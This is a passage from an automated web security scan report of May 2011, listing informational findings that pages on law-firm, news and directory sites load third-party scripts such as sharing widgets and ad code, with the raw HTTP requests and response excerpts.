Path:   /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:34 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 22961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<span id="sl_sharethis"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=eac76021-5b51-41d1-a137-dc18360b58c0&amp;headerbg=%23D6C194&amp;inactivebg=%23EEE7D6&amp;embeds=true"></script>
...[SNIP]...
</div>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAALN-P99DGUTxv0zLZ3KmoxxSpNqs40LI3jeHQjq0vt6dXRDCS4BROOzR1ECgzSqL6otikI6yLqXbiZg" type="text/javascript"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
       <script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
25.76. http://www.tydingslaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tydings+%26+Rosenberg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; expires=Thu, 21-Jul-2011 02:44:31 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:04:31 GMT
Content-Length: 28434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.77. http://www.tydingslaw.com/ArticlesPublications.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /ArticlesPublications.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ArticlesPublications.aspx HTTP/1.1
Host: www.tydingslaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg; __utma=39294886.1731180425.1305216163.1305216163.1305218985.2; language=en-US; __utmc=39294886; __utmb=39294886.1.10.1305218985; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:01:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.78. http://www.tydingslaw.com/Content.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /Content.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Content.aspx?topic=Another_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmb=39294886.3.10.1305216163; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:56 GMT
Content-Length: 23263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.79. http://www.tydingslaw.com/OurAttorneys.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /OurAttorneys.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /OurAttorneys.aspx HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tydingslaw.com/Content.aspx?topic=Another_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:51:45 GMT
Content-Length: 34541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.80. http://www.tydingslaw.com/PracticesIndustries.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /PracticesIndustries.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticesIndustries.aspx HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tydingslaw.com/
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmb=39294886.1.10.1305216163; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:05:12 GMT
Content-Length: 22274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.81. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /PracticesIndustries/Attorneys.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticesIndustries/Attorneys.aspx HTTP/1.1
Host: www.tydingslaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg; __utma=39294886.1731180425.1305216163.1305216163.1305218985.2; language=en-US; __utmc=39294886; __utmb=39294886.1.10.1305218985; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 121628
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:01:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.82. http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tydingslaw.com/PracticesIndustries.aspx
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmb=39294886.2.10.1305216163; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:06:31 GMT
Content-Length: 33190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.83. http://www.tydingslaw.com/SearchResults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /SearchResults.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SearchResults.aspx HTTP/1.1
Host: www.tydingslaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg; __utma=39294886.1731180425.1305216163.1305216163.1305218985.2; language=en-US; __utmc=39294886; __utmb=39294886.1.10.1305218985; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47590
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:01:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
25.84. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 56512


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>

<script src="http://symbolcomplete.marketwatch.com/SymbolComplete/service.aspx?license=243391227070AE2A4A9752CBB727399B5969C0E2ECBFB2B3A01E585B950F63B63742DEEDF3B6DC0AECA370F53F357DF5527C71212A08BE321F61DB652CFC2854E2BD173549A6A87EC127C0A29B6AB4E82B2FE6FAEA1D1A4327EACC692DF31201EA6CB24F3DF5A97CAA2225FBEDCDE715F1CEFF77CB02259BDBB08087B10779F214B3FA86"></script>
...[SNIP]...
</script>

<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...
</script>
<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...
25.85. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<script src="https://www.google.com/jsapi"></script>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
25.86. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<script src="https://www.google.com/jsapi"></script>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
25.87. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<script src="https://www.google.com/jsapi"></script>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
25.88. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2009/06/17/AR2009061701900.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wp-dyn/content/article/2009/06/17/AR2009061701900.html HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html
Expires: Thu, 12 May 2011 16:59:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:59:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64251

<html>
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>
<script>var wp_ms_start = new Date().getTime();</script>
<script type="text/javascript" src="http://media3.washington
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.sphere.com/widgets/sphereit/js?siteid=washpost_opinions&baseurl=http://edge.sphere.com/widgets/sphereit/"></script>
...[SNIP]...
<div class="sidebarColumnGeneric" id="sidebarColumnYahooBuzz">
<script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">washington_po284:http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html</script>
...[SNIP]...
</script><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531"></script>
...[SNIP]...
25.89. http://www.wi-ala.org/ClubPortal/wala/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ClubPortal/wala/ HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522775;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFTOKEN=160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522775%26CFTOKEN%23%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23hitcount%3D2%23cftoken%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23cfid%3D26522775%23;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
